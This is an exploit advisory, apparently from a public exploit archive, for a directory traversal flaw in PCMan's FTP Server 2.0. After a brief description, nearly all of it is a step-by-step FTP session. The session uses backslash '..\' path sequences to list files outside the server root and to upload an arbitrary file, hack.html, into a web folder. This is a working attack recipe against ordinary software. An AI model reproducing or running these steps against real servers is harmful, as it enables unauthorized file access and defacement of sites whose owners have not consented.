|
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Directory Traversal
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
#
####################################################################
Description:
=====================
A vulnerability has been identified in PCMan's FTP Server 2.0,
which allows attackers to read or write(upload,download...etc) arbitrary files.
Exploit:
=====================
C:\>ftp 127.0.0.1
Connected to 127.0.0.1.
220 PCMan's FTP Server 2.0 Ready.
User (127.0.0.1:(none)): chako
331 User name okay, need password.
Password:
230 User logged in
ftp> dir
200 Command okay.
150 File status okay; Open data connection.
-rwxr--r-- 0 ftp ftp 12 Jun 26 01:05 test.txt
226 Data Sent okay.
ftp: 54 bytes received in 0.00Seconds 54000.00Kbytes/sec.
ftp> dir ../../../../../../../../../web
200 Command okay.
550 File not found or access denied.
ftp> dir ..\..\..\..\..\..\..\web
200 Command okay.
150 File status okay; Open data connection.
-rwxr--r-- 0 ftp ftp 54 Jun 26 00:40 hello.asp
-rwxr--r-- 0 ftp ftp 37 Jun 26 00:07 index.html
226 Data Sent okay.
ftp: 111 bytes received in 0.00Seconds 111000.00Kbytes/sec.
ftp> put hack.html ..\..\..\..\..\..\..\web\hack.html
200 Command okay.
150 File status okay; Open data connection.
226 Data Sent okay.
ftp: 1058 bytes sent in 0.00Seconds 529.00Kbytes/sec.
ftp> dir ..\..\..\..\..\..\..\web
200 Command okay.
150 File status okay; Open data connection.
-rwxr--r-- 0 ftp ftp 1058 Jun 26 03:53 hack.html
-rwxr--r-- 0 ftp ftp 54 Jun 26 00:40 hello.asp
-rwxr--r-- 0 ftp ftp 37 Jun 26 00:07 index.html
226 Data Sent okay.
ftp: 168 bytes received in 0.00Seconds 168000.00Kbytes/sec.
ftp>
|
推荐
评论(0条)
